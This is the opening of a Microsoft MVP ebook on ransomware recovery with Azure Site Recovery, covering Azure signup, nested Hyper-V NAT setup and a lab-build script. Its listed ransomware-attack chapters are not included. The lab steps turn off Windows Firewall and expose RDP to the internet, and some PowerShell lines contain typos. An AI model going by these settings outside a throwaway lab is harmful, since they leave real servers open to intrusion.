258 82 12MB
English Pages 193
Surviving a Ransomware Attack with Azure Site Recovery Volume 1
By Microsoft MVP’s: Dave Kawula Cristal Kawula Emile Cabot Cary Sun John O’Neill Sr - rMVP
PUBLISHED BY MVPDays Publishing http://www.mvpdays.com Copyright © 2019 by MVPDays Publishing All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means without the prior written permission of the publisher. ISBN: TBD Warning and Disclaimer Every effort has been made to make this manual as complete and as accurate as possible, but no warranty or fitness is implied. The information provided is on an “as is” basis. The authors and the publisher shall have neither liability nor responsibility to any person or entity concerning any loss or damages arising from the information contained in this book. Feedback Information We’d like to hear from you! If you have any comments about how we could improve the quality of this book, please don’t hesitate to contact us by visiting www.checkyourlogs.net or sending an email to [email protected].
iii
Acknowledgments
Foreword by Acknowledgments From Dave Cristal, you are my rock and my source of inspiration. For the past 20 + years you have been there with me every step of the way. Not only are you the “BEST Wife” in the world you are my partner in crime. Christian, Trinity, Keira, Serena, Mickaila, Mackenzie, and Rycker, you kids, are so patient with your dear old dad when he locks himself away in the office for yet another book. Taking the time to watch you grow in life, sports, and become little leaders of this new world is incredible to watch. Thank you, Mom and Dad, (Frank and Audry) and my brother Joe. You got me started in this crazy IT world when I was so young. Brother, you mentored me along the way both coaching me in hockey and helping me learn what you knew about PCs and Servers. I’ll never forget us as teenage kids working the IT Support contract for the local municipal government. Remember dad had to drive us to site because you weren’t old enough to drive ourselves yet. A great career starts with the support of your family, and I’m so lucky because I have all the support one could ever want. Last but not least, the MVPDays volunteers, you have donated your time and expertise and helped us run the event in over 20 cities across North America. Our latest journey has us expanding the conference worldwide as a virtual conference. For those of you that will read this book, your potential is limitless just expand your horizons, and you never know where life will take you.
iii
About the Authors
About the Authors Dave Kawula – Microsoft MVP Dave is a Microsoft Most Valuable Professional (MVP) with over 20 years of experience in the IT industry. His background includes data communications networks within multi-server environments, and he has led architecture teams for virtualization, System Center, Exchange, Active Directory, and Internet gateways. Very active within the Microsoft technical and consulting teams, Dave has provided deep-dive technical knowledge and subject matter expertise on various System Center and operating system topics. Dave is well-known in the community as an evangelist for Microsoft, 1E, and Veeam technologies. Locating Dave is easy as he speaks at several conferences and sessions each year, including TechEd, Ignite, MVP Days Community Roadshow, and VeeamOn. Recently Dave has been honored to take on the role of Conference Co-Chair of TechMentor with fellow MVP Sami Laiho. The lineup of speakers and attendees that have been to this conference over the past 20 years is fantastic. Come down to Redmond or Orlando in 2018, and you can meet him in person. Checkout his speaking site at www.davekawula.com He recently tied for 1st place out of 1800 speakers at the Microsoft Ignite Conference in Orlando. As the founder and Managing Principal Consultant at TriCon Elite Consulting, Dave is a leading technology expert for both local customers and large international enterprises, providing optimal guidance and methodologies to achieve and maintain an efficient infrastructure. BLOG: www.checkyourlogs.net Twitter: @DaveKawula
iv
About the Authors
Cristal Kawula – Microsoft MVP Cristal Kawula is the co-founder of MVPDays Community Roadshow and #MVPHour live Twitter Chat. She was also a member of the Technical Advisory board and is the President of TriCon Elite Consulting. Cristal is also only the 2nd Woman in the world to receive the prestigious Veeam Vanguard award. Cristal can be found speaking at Microsoft Ignite, MVPDays, and other local user groups. She is extremely active in the community and has recently helped publish a book for other Women MVP’s called Voices from the Data Platform. This year at Microsoft Ignite she lead community meetups for various topics such as Women in IT, Parenting in IT, Diversity in Tech, and becoming a Community Rockstar. BLOG: http://www.checkyourlogs.net Twitter: @supercristal1
v
About the Authors
Emile Cabot – Microsoft MVP Emile started in the industry during the mid-90s working at an ISP and designing celebrity web sites. He has a strong operational background specializing in Systems Management and collaboration solutions and has spent many years performing infrastructure analyses and solution implementations for organizations ranging from 20 to over 200,000 employees. Coupling his wealth of experience with a small partner network, Emile works very closely with TriCon Elite, 1E, and Veeam to deliver low-cost solutions with minimal infrastructure requirements. He actively volunteers as a member of the Canadian Ski Patrol, providing over 250 hours each year for first aid services and public education at Castle Mountain Resort and in the community.
BLOG: http://www.checkyourlogs.net Twitter: @ecabot
vi
About the Authors
Cary Sun – Microsoft MVP Cary Sun is CISCO CERTIFIED INTERNETWORK EXPERT (CCIE No.4531) and MCSE, MCIPT, Citrix CCA with over twenty years in the planning, design, and implementation of network technologies and Management and system integration. Background includes hands-on experience with multiplatform, all LAN/WAN topologies, network administration, E-mail and Internet systems, security products, PCs and Servers environment. Expertise is analyzing user’s needs and coordinating system designs from concept through implementation. Exceptional analysis, organization, communication, and interpersonal skills. Demonstrated ability to work independently or as an integral part of a team to achieve objectives and goals. Specialties: CCIE /CCNA / MCSE / MCITP / MCTS / MCSA / Solution Expert / CCA Cary’s is a very active blogger at checkyourlogs.net and always available online for questions from the community. He passion for technology is contagious, and he makes everyone around him better at what they do. Blog:http://www.checkyourlogs.net Twitter:@SifuSun
vii
About the Authors
John O’Neill Sr – Re-Connect Microsoft MVP
viii
Contents
Contents Foreword by .................................................................................................................. iii Acknowledgments ........................................................................................................ iii From Dave ............................................................................................................. iii About the Authors ........................................................................................................ iv Dave Kawula – Microsoft MVP .................................................................................... iv Cristal Kawula – Microsoft MVP ................................................................................... v Emile Cabot – Microsoft MVP ..................................................................................... vi Cary Sun – Microsoft MVP ......................................................................................... vii John O’Neill Sr – Re-Connect Microsoft MVP .......................................................... viii Contents........................................................................................................................ ix Introduction ................................................................................................................. 14 MVPDays Online .......................................................................................................... 14 Sample Files ............................................................................................................. 15 Additional Resources ................................................................................................ 15 Chapter 1...................................................................................................................... 17 Setting up your Azure Subscription from Scratch .................................................... 17 Chapter 2...................................................................................................................... 24 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure ........... 24 ix
Contents
Building a Windows Server 2016 Virtual Machine ................................................ 24 Creating Multiple Internal and External IP’s for the Lab ........................................ 35 Enable Hyper-V in the LAB Virtual Machine ......................................................... 42 Configuring NAT Networking with one Public IP Address ..................................... 50 Configuring NAT Networking with Multiple Public IP Address ................................... 53 Adding an IP Address to the lab Host (VM) .......................................................... 53 Configuring Routing and Remote Access on the Azure Nested Virtual Machine... 57 Configure NAT Rules in RRAS for the Lab ........................................................... 65 Disable Windows Firewall .................................................................................... 72 Create a NAT Rule in the Azure NSG for the Lab................................................. 74 Testing the NAT Rules in the lab .......................................................................... 80 Using PowerShell to automate RRAS NAT Rule Configurations........................... 85 Chapter 3...................................................................................................................... 88 Using BigDemo to Build your Lab .............................................................................. 88 Lab Server Names .................................................................................................... 88 Building the Lab with BigDemo_ASR_WAC.PS1 ...................................................... 91 Chapter 4...................................................................................................................... 95 Configuring Windows Admin Center ......................................................................... 95 Install Google Chrome and Mozilla FireFox .......................................................... 96 Configure Windows Admin Center........................................................................ 97 Configure Azure Integration.................................................................................. 99 Configure Azure Backup .................................................................................... 104 Verifying Backups locally with the Backup Microsoft Azure Backup Agent ......... 110 Configuring Windows Azure Update Management ............................................. 112 x
Contents
Configure Azure Site Recovery .......................................................................... 119 Upgrade to Security Center Standard in Azure ................................................... 125 Chapter 5.................................................................................................................... 127 Windows Defender Advanced Threat Protection ATP ............................................ 127 Onboarding a Server with Windows Defender ATP ............................................ 128 Reviewing an Incident with Windows Defender Advanced Threat Protection ..... 130 Chapter 6.................................................................................................................... 133 Simulating a Ransomware Attack ............................................................................ 133 KnowBe4 Ransomware Simulator on Windows Server 2019.............................. 133 Enabling Ransomware Protection on Windows Server 2019 .............................. 141 Executing a Ransomware Attack with PowerShell .............................................. 145 Chapter 7.................................................................................................................... 152 Recovering from Ransomware using Azure Site Recovery ................................... 152 Notes from the Field................................................................................................ 152 Why Airgapped Replicas are the only choice ..................................................... 152 Why Planned Failover is no longer an option ..................................................... 152 Failover Now is the only Option .......................................................................... 153 Watch you Six (Clock) ........................................................................................ 153 Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site VPN ................................................................................................................... 154 When can I get back into my data? .................................................................... 154 Ok, so I didn’t listen and lost everything now what? ........................................... 155 Don’t forget to tune your Replication Policy ........................................................ 156 Testing Failover can be a quick Ransomware Fix .............................................. 156 xi
Contents
Reset Settings for your Azure Site Recovery Hyper-V Host................................ 157 Enable Diagnostic Logging for Azure Site Recovery........................................... 162 Zero Day time to Failover ........................................................................................ 163 Assuming an Admin Level breach Failing over 100 % to Azure .......................... 163 Executing a PowerShell based Ransomware Attack on Domain Controllers. ..... 163 Encrypting the Sysvol Folder .............................................................................. 165 Taking Down Production Killing Domain Controllers with Ransomware .............. 171 Encrypting the Active Directory Database .......................................................... 171 Survival Mode Recovering to Azure ........................................................................ 178 Tick Tock time to make a decision – We are Recovering to Azure ..................... 179 Performing the Double Swing Recovery ............................................................. 180 Chapter 8.................................................................................................................... 188 Disaster Recovery items left forgotten .................................................................... 188 Chapter 9.................................................................................................................... 189 Join us at MVPDays and meet great MVP’s like this in person .............................. 189 Live Presentations .................................................................................................. 189 Video Training......................................................................................................... 189 Live Instructor-led Classes ...................................................................................... 190 Consulting Services ................................................................................................ 190
xii
Contents
xiii
Introduction MVPDays Online
Introduction
MVPDays Online The purpose of this book is to showcase the fantastic expertise of our guest speakers of MVPDays Online. They have so much passion, expertise, and expert knowledge that it only seemed fitting to write it down in a book.
MVPDays was founded by Cristal and Dave Kawula back in 2013. It started as a simple idea; “There’s got to be a good way for Microsoft MVPs to reach the IT community and share their vast knowledge and experience in a fun and engaging way” I mean, what is the point in recognizing these bright and inspiring individuals, and not leveraging them to inspire the community that they are a part of. We often get asked the question “Who should attend MVPDays”? Anyone that has an interest in technology is eager to learn and wants to meet other like-minded individuals. This Roadshow is not just for Microsoft MVP’s it is for anyone in the IT Community. Make sure you check out the MVPDays website at www.mvpdays.com. You never know maybe the roadshow will be coming to a city near you. The goal of this particular book is to show you how to survive a Ransomware Attack using Azure Site Recovery. Each chapter is broken down into a unique tip, and we hope you find some immense value in what we have written.
14
Introduction MVPDays Online
Sample Files All sample files for this book can be downloaded from www.checkyourlogs.net and https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery
Additional Resources In addition to all the tips and tricks provided in this book, you can find extra resources like articles and video recordings on our blog http://www.checkyourlogs.net
15
Introduction MVPDays Online
16
Chapter 1 Setting up your Azure Subscription from Scratch
Chapter 1
Setting up your Azure Subscription from Scratch As we know, there are lots of features in Microsoft Azure, to use those features, you need to create a Microsoft Azure account, it’s straightforward to create, also you will get $200 credits at the first month. If you are a newcomer on Microsoft Azure, no worry, I am going to show you how to create Azure free account with $200 credit today, follow the steps as below.
1. Go to https://www.azure.com and then click Free account.
17
Chapter 1 Setting up your Azure Subscription from Scratch
2. On the free account page, click Start free.
3. If you have an account with Microsoft already (e.g., office 365, outlookf.com …. ), enter your email address and then click Next. If you don’t have Microsoft account, please click Crete one.
4. If your email address is used with more than on account from Microsoft, you need to select which account do you want to use.
18
Chapter 1 Setting up your Azure Subscription from Scratch
5. Enter your password and then click Sign in
19
Chapter 1 Setting up your Azure Subscription from Scratch
6. On the About you page, enter your personal information and then click Next.
7. On the Identity verification by card page, you need to enter your credit card information and then click Next. Don’t worry, Microsoft won’t charge you until you upgrade your free
20
Chapter 1 Setting up your Azure Subscription from Scratch
account to pay as you go or others account type.
8. On the Agreement page, select I agree to the subscription agreement, offer details, and privacy statement and I would like information, tips, and offers from Microsoft or selected partners about Azure, including Azure Newsletter, Pricing updates, and other
21
Chapter 1 Setting up your Azure Subscription from Scratch
Microsoft products and services, and then click Sign up.
9. Congratulation! You’re ready to start with Azure and get $250 create for free. You need to click Go to the portal and enjoy Azure features there.
10. That’s it you have now successfully setup your first Azure Tenant and have access to the Azure Portal.
22
Chapter 1 Setting up your Azure Subscription from Scratch
23
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Chapter 2
Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure In this chapter, we are going to show you how to build a Hyper-V nested VM with multiple public IP addresses. In this lab configuration, you only need to pay Microsoft for one Hyper-V host (VM) with storage and public IP addresses. After it is configured, you can install a firewall, create VMs, a load balancer, configure customer routing, port forwarding and so on. These scenarios can be used to build up real-world labs for Test, Development, or even proof of concepts.
Building a Windows Server 2016 Virtual Machine 1. Logon to your Microsoft Azure Account and select Create a resource.
24
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
2. On the New page, select Windows Server 2016 VM
3. On the Create a virtual machine page, click Basics and select your Azure Subscription to pay for this virtual machine.
4. Select Create new under the Resource group and enter resource group name, I will recommend it as your virtual machine name, because it will easy to maintain your
25
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
resources, and then click OK.
5. Virtual Machine Name: Enter Virtual Machine Name as your resource group name. Region: Select Region for the virtual machine. For my case, I am using West US 2. Availability options: keep the default setting Image: select Windows Server 2016 Datacenter Size: click change size and select the Dv3 and Ev3 VM sizes. Because we need to enable nested virtualization. Username: Enter login user name Password: Enter login password
26
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Confirm password: Reenter login password
Public inbound ports: Select Allow selected ports. Select inbound ports: Select RDP (3389) Already have a Windows license: Select Yes if you have a license already. Confirmation: select I confirm I have an eligible Windows license with Software Assurance or Windows Server subscription to apply for this Azure Hybrid Benefit.
27
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
6. On the Create a Virtual Machine page, click Disks.
OS disk type: Select Premium SSD DATA DISKS: Select Create and attach a new disk (this storage space is for your nested VMs)
28
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. On the Create a new disk page, settings as follow and then click OK. Disk type: Select Premium SSD Name: keep the default name Size(GiB): 4095 Source type: None
29
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
8. On the Create a virtual machine page, click Networking.
Virtual network: Select vnet if you have existing vnet if not, you can keep the default settings. Subnet: Select subnet name if you have an existing subnet; if not, you can keep the default settings. Public IP: click Create new
30
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
9. On the Create Public IP address page, the settings are as follows Name: Enter the Public IP address name. SKU: Basic Assignment: Static 10. To complete Networking settings as follow: Network security group: Basic Public inbound ports: Allow selected ports Select inbound ports: RDP
31
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Accelerated networking: On
1. On the Create a virtual machine page, click Management and keep the settings as default.
32
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
11. On the Create a virtual machine page, click Guest config and keep the settings as default.
12. On the Create a virtual machine page, click Tags and keep the settings as default.
33
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
13. On the Create a virtual machine page, click Review + create and make sure Validation passed and then click Create.
34
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Creating Multiple Internal and External IP’s for the Lab 1. On the Microsoft Azure portal page, select Virtual machines.
2. On the Virtual machines page, click GDMCALABHV1.
35
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
3. On the GDMCALABHV1page, select Networking.
4. On the GDMCALABHV1-Networking page, select Network Interface: gdmcalabhv1238.
5. On the Network Interface page, select IP configurations.
36
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
6. On the IP configurations page, select ipconfig1.
7. Change assignment setting from Dynamic to Static, and then click Save.
8. Go back to the IP configurations page, click Add.
9. On the Add IP configuration page, settings as follow and then click OK. 37
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Name: ipconfig2 Private IP address Allocation: Static IP address: 10.10.1.9 Public IP address: Enable IP address: click configure required settings
10. Choose public IP address: Create new Name: Enter name for Public IP SKU: Basic
38
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Assignment: Static and then click OK
Choose public IP address: Create new Name: Enter name for Public IP SKU: Basic Assignment: Static and then click OK
39
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
11. On the Add IP configuration page, click OK.
40
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
12. Repeat Add IP configurations steps If you need more public IP addresses.
41
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Enable Hyper-V in the LAB Virtual Machine 1. Start Azure virtual machine and log in. 2. Open Disk Management to partition and format for your new 4TB storage space. (Use ReFS + 64 KB Block Size.)
42
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
3. On the Server Manager Dashboard, click Add roles and feature.
4. On the Before you begin page, click Next.
43
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
5. On the Select installation type, select Role-based or feature-based installation and then click Next.
6. On the Select destination server page, click Next.
44
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. On the Select server roles page, select Hyper-V, click Add Features and then click Next.
8. On the Select features page, click Next.
45
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
9. On the Hyper-V page, click Next.
10. On the Create Virtual Switches page, don’t select any interface and click Next.
46
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
11. One the Virtual Migration page, click Next.
12. On the Default Stores page, you can change the default location to your new 4TB storage space and then click Next.
47
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
13. On the Confirm installation selections page, select Restart the destination server automatically if required and then click install.
14. Login to Azure Virtual machine after it restarted. 15. On the installation progress page, click Close.
48
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
49
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Configuring NAT Networking with one Public IP Address To configure NAT Networking, we need to create an Internal Virtual Switch for nested guest VMs. In general, there are two options for networking with nested virtual machines, MAC Address Spoofing, and NAT networking. Unfortunately, MAC Address Spoofing is not possible in a public cloud environment. So, If you are using an Azure virtual machine network interface as your Hyper-V external virtual switch and have assigned it to nested guest VMS, the guest VMs won’t be able to access the Internet. At this point, we have no choice, but to use NAT networking. The steps below show how to configure a NetNat Virtual Switch with a single Public IP Address.
1. We can create an internal virtual switch and create NAT rules via Powershell cmdlet as follow:
NNew-VMSwitch -Name "NATNetwork" -SwitchType Internal Get-NetAdapter New-NetIPAddress -IPAddress 192.168.100.1 -PrefixLength 24 InterfaceIndex 14 New-NetNat -Name "NATNetwork" -InternalIPInterfaceAddressPrefix 192.168.100.0/24
50
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
2. You also can configure port forwarding by Powershell cmdlet as follow:
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 443 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 443 NatName NatNetwork
51
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 80 -Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 80 -NatName NatNetwork
52
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Configuring NAT Networking with Multiple Public IP Address For a real proof of concept (PoC) or production environment, we may need more than one public IP address. We have found that this isn’t possible with the NetNat Internal vSwitch. As a result, we have figured out how to set this up using Microsoft Routing and Remote Access on the Host (Azure VM). Following these steps are going to be the most critical part of this book. These steps allow us to add as many External Public IP Addresses in Azure and NAT them into our Lab Virtual Machines. This gives you the most realistic lab experience possible.
Adding an IP Address to the lab Host (VM) 1. Login to Azure Virtual Machine. 2. Open Command prompt and run ipconfig /all and then write down the DNS IP address. 3. Add all of the IP addresses to the Azure Virtual Machine network interface, for my case are 10.10.1.8-10
53
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
4. Re-run ipconfig /all again, and you will now see all of IP addresses under the network interface.
5. Open Hyper-V Manager tool and click Virtual Switch Manager.
54
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
6. Select Internal and click Create Virtual Switch.
55
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. Change switch name to NAT Network Switch and then click OK.
8. Assign IP address as 192.168.100.1/24 to vEthernet (NAT Network Switch)
56
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Configuring Routing and Remote Access on the Azure Nested Virtual Machine To configure Port Forwarding (NAT) into our lab we will use the Built-In Routing and Remote Access role in Windows. The steps below will walk you through the configuration required.
1. 1. 2. 3. 4. 5. 6. 7. 8.
Login to the Nested Azure Virtual Machine. On the Dashboard page, select Add Roles and features On the Before you begin page, click Next. On the Select installation type page, click Next. On the Select destination server page, click Next. On the Select server roles page, select Remote Access and click Next. On the Select features page, click Next. On the Remote Access page, click Next. On the Select Role Services page, select Routing and click Add Features and then click Next.
9. On the Web Server Role (IIS) page, click Next. 57
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
10. On the Select role services page, click Next. 11. On the Confirm installation selections page, select Restart the destination server atomically if required, click Install.
12. On the Installation progress page, click Close. 13. Open Routing and Remote Access tool.
58
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
14. Right-click the server name and select Configure and Enable Routing and Remote Access.
15. On the Welcome page, click Next.
59
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
16. On the Configuration page, select Network address translation (NAT), click Next.
60
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
17. On the NAT Internet Connection page, select Ethernet 2 as public Interface, click Next.
61
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
18. On the Name and Address Translation Services page, select Enable basic name and address services, click Next.
62
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
19. On the Address Assignment Range page, click Next.
63
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
20. Click Finish on the Completing setup wizard page.
64
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Configure NAT Rules in RRAS for the Lab 1. Open Routing and Remote Access, Expand the IPv4 and select NAT.
2. Right-click Ethernet 2 and select Properties.
65
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
3. Select Address Pool and click Add.
66
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
4. Enter IP addresses and mask and click OK, those IP addresses are being created with Public IP addresses at the azure portal.
67
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
5. Select Services and Ports and then click Add.
6. Settings as follow for TCP port 443 port forwarding and then click OK. Description of Services: TCP443-10.10.1.10 On this address pool entry: 10.10.1.10 Protocol: TCP Incoming port: 443 Private IP address: 192.168.100.99
68
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Outgoing port: 443
7. On the Ethernet 2 properties page, click OK.
69
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
8. You can repeat steps to create it for port 80 and port 3389 as well.
70
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
71
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Disable Windows Firewall 1. We will use Azure NSG, so please disable windows firewall at Azure Virtual Machine. 2. On the Server Manager page, select Local Server and then select Windows Firewall Public ON, Private On.
3. On the Windows Firewall page, select Turn Windows Firewall on or off.
72
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
4. On the customize page, select turn off Windows Firewall on Private Network and Public Network and then click OK.
73
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Create a NAT Rule in the Azure NSG for the Lab The following steps will show you how to create a NAT Rule on the Azure NSG. 1. Go back to the Azure portal and log in with your account. 2. On the Dashboard page, select Virtual machines.
74
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
3. On the Virtual machines page, select the Virtual machine which you are using as Hyper-V host.
4. One the GDMCALABHV1 virtual machine page, select Networking.
75
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
5. On the Networking page, click Add inbound port rule.
76
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
6. On the Add inbound security rule, change Destination port rages to 443, Protocol to TCP, Name to Port_443 and then click Add.
77
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
78
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. Repeat steps to add port 80.
79
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Testing the NAT Rules in the lab Now, we can test the port forwarding functionality and make sure it is working.
1. Create a Guest Virtual Machine on the Nested Azure Host (VM). Make sure the network adapter is configured to use the NAT Network Switch, and assign IP address of 192.168.100.99/24, the default gateway is 192.168.100.1, you can use the 8.8.8.8 as DNS.
80
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
81
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
2. Enable remote desktop for test RDP (TCP port 3389) and turn off Windows firewall.
3. Install IIS features on this machine. If you would like to test SSL (Port 443) setup and configure the SSL Certificate in IIS.
82
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
4. Let’s do RDP to from Internet to Web-Test machine via Public IP address (GDMCALABHV1-PublicIP3).
5. If you can successfully connect your NAT Rules are working through the Azure NSG and also through the RRAS configuration on the Nested Host in Azure.
6. Next, test Port 80 from the internet via (GDMCALABHV1-PublicIP3), and it will show you the default IIS website. This also validates that the Port Forwarding is working.
83
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. Last you can validate the NAT Session Mapping on the Azure Nested Host (VM) using the Routing and Remote Access tool.
84
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Using PowerShell to automate RRAS NAT Rule Configurations Configuring NAT Rules in Routing and Remote Access can be very time consuming and tedious. In the steps below we will show you how to bulk configure rules using PowerShell. First, review the following code: $Port=1000 $HostInterfaceName="Ethernet 4" $Protocol="TCP" $PublicIP="10.10.1.101" $PrivateIP="192.168.100.101" for ($Port=1000; $Port -le 1010; $Port++) {netsh routing ip nat add portmapping name=$HostInterfaceName proto=$Protocol publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port }
This will create a Custom Service (NAT Rule) in Routing and Remote Access on Interface Ethernet 4, TCP, Ports 1000-1010.
Let’s run the script and see what happens.
85
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
You can also run netsh routing dump to see the output.
Overall, this is an easy way to automate the creation of the NAT Rules for your lab.
86
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
87
Chapter 3 Using BigDemo to Build your Lab
Chapter 3
Using BigDemo to Build your Lab Lab Server Names The following table describes the required Virtual Machines to build this lab. This lab is designed to be built on a Hyper-V Host Server with a minimum of 16 GB of RAM. An automation script called BigDemo_ASR_WAC.ps1 has been used to provision this lab environment. You can download a copy from here: https://github.com/dkawula/Surviving-a-Ransomware-Attack-UsingAzure-Site-Recovery/blob/master/BigDemo_ASR_WAC.ps1
88
Chapter 3 Using BigDemo to Build your Lab
Hostname
Role
Operating System
DC01
Primary Domain Controller running Active Directory Certificate Services as an Enterprise Root
Windows Server 2019
DC02
Secondary Domain Controller running Active Directory
Windows Server 2019
S2D2019-1
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019-2
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019-3
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019-4
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019-5
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019-6
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019-7
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019-8
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019DR-1
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019DR-2
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
89
Chapter 3 Using BigDemo to Build your Lab
90
S2D2019DR-3
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
S2D2019DR-4
Storage Spaces Direct – HyperV Cluster Node LTSC
Windows Server 2019
DRTitan01
Standalone – Hyper-V Cluster Node LTSC
Windows Server 2019
Router01
Windows NAT Router for the LAB
Windows Server 2019
DHCP01
DHCP Server for the Lab
Windows Server 2019
Management01
Management01
Windows Server 2019
AZHVHost
DS8 Virtual Machine in Azure running Nested Virtualization and Hyper-V. This will be the host that we run the lab on. This could also be a Laptop or a physical server in your environment.
Windows Server 2019
Chapter 3 Using BigDemo to Build your Lab
Building the Lab with BigDemo_ASR_WAC.PS1 For this book, we wanted to help you build a lab that you could easily follow along with. If you have read some of our other books, you would have seen a script that we use called BigDemo. BigDemo is a PowerShell script that builds a lab environment including AD, DHCP, Management Servers, Clients, Application Servers, and others. It is highly customizable, and we have created an extraordinary edition just for this book. Follow the instructions below to download the script from our Github Repository and start building your very own lab to follow along with.
Instructions
Screenshot (if applicable)
1. Logon to the AZHVHost machine in Azure as Administrator 2. Open an administrative PowerShell prompt and type:
3. Next Download a copy of Windows Server 2016 RTM from the Microsoft Eval Center. For our lab, we have a drive on our Hyper-V Host F:\
Invoke-WebRequest -Uri " https://raw.githubusercontent.com/dkawula/Survivinga-Ransomware-Attack-Using-Azure-SiteRecovery/master/BigDemo_ASR_WAC.ps1" -OutFile "C:\Post-Install\BigDemo_ASR_WAC.PS1"
https://www.microsoft.com/en-us/evalcenter/evaluatewindows-server-2016/
91
Chapter 3 Using BigDemo to Build your Lab
Save the ISO to F:\DCBuild_Insider
